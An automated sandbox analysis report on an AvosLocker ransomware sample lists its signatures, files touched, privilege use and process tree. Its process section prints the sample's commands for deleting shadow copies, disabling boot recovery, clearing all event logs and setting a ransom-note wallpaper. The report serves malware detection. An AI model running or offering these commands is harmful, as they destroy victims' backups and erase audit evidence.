Malware Analysis Report

2024-10-16 03:26

Sample ID 240909-tyy34ayalr
Target 240908-rntphssgre_pw_infected.zip
SHA256 e76ac2944fb3f66037bc7dd7e83f63bc58099ff2fe31658085c1fdf3d99e3f87
Tags
avoslocker defense_evasion discovery evasion execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e76ac2944fb3f66037bc7dd7e83f63bc58099ff2fe31658085c1fdf3d99e3f87

Threat Level: Known bad

The file 240908-rntphssgre_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion discovery evasion execution impact ransomware

Avoslocker Ransomware

Deletes shadow copies

Renames multiple (8501) files with added filename extension

Renames multiple (10420) files with added filename extension

Modifies boot configuration data using bcdedit

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Unsigned PE

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Interacts with shadow copies

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-09 16:28

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-09 16:28

Reported

2024-09-09 16:31

Platform

win7-20240704-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (10420) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\672180750.png" | C:\Windows\system32\reg.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18236_.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00942_.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\it-IT\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Oral | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Casual.css | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107132.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212601.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01568_.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14829_.GIF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15059_.GIF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107150.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\kaa.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107264.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\SpiderSolitaire.exe.mui | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\jfxrt.jar | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\charsets.jar | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATHEDITOR_F_COL.HXK | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\ELPHRG01.WAV | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00807_.WMF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\WT61FR.LEX | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45B.GIF | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\settings.css | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Grid.thmx | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Common Files\System\ado\en-US\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\af\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Paris | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files\Windows Photo Viewer\en-US\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1580 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2972 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2972 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2972 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2972 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 992 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 992 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 992 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 992 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 880 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 880 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 880 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 880 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 880 wrote to memory of 2900 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 2900 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 2900 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2968 wrote to memory of 3148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2968 wrote to memory of 3148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2052 wrote to memory of 1604 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2052 wrote to memory of 1604 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2052 wrote to memory of 1604 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2972 wrote to memory of 3452 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 2972 wrote to memory of 3452 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 2972 wrote to memory of 3452 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 992 wrote to memory of 3472 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 992 wrote to memory of 3472 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 992 wrote to memory of 3472 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1580 wrote to memory of 3912 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 3912 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 3912 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 3912 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3912 wrote to memory of 4568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 3912 wrote to memory of 4568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 3912 wrote to memory of 4568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 3912 wrote to memory of 3168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe
PID 3912 wrote to memory of 3168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe
PID 3912 wrote to memory of 3168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\672180750.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

